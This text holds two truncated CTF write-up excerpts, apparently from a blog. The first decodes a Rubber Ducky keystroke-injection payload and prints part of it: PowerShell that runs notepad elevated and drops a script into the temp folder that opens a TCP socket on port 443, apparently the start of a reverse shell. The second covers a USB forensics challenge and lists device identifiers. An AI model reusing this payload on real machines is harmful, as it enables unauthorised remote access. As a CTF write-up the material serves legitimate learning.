Note: I did not solve this challenge during the CTF, but my teammate Lukho did. For this challenge, we were given an inject.bin file, which contains an encoded Rubber Ducky payload. We can use the Duck Toolkit to get back the original code: DELAY DELAY powershell Start-Process notepad -Verb runAsENTER DELAY DELAY ENTER DELAY mDELAY DOWNARROW ... DOWNARROW ENTER $folderDateTime = (get-date).ToString('d-M-y HHmmss')ENTER ... Add-Content "$env:TEMP\72794.ps1" '$c = New-Object System.Net.Sockets.TCPClient("CYBERTF{D0N4LD_DUC|<}",443);$s = $c.

Note: I did not solve this challenge during the CTF, but my teammate Volker did. For this challenge, we were given a zip containing an encoded syslog (sysloc.enc), and an auth.json file: { "manufact": [ "Apple Inc.", "Azurewave", "Generic", "Linux 5.10.0-kali8-amd64 xhci-hcd", "usbrip-4381" ], "pid": [ "0002", "0003", "0129", "0608", "12a8", "3491", "56dd", "usbrip-4381" ], "prod": [ "USB2.0 HD UVC WebCam", "USB2.0 Hub", "USB2.0-CRW", "iPhone", "usbrip-4381", "xHCI Host Controller" ], "serial": [ "0000:03:00.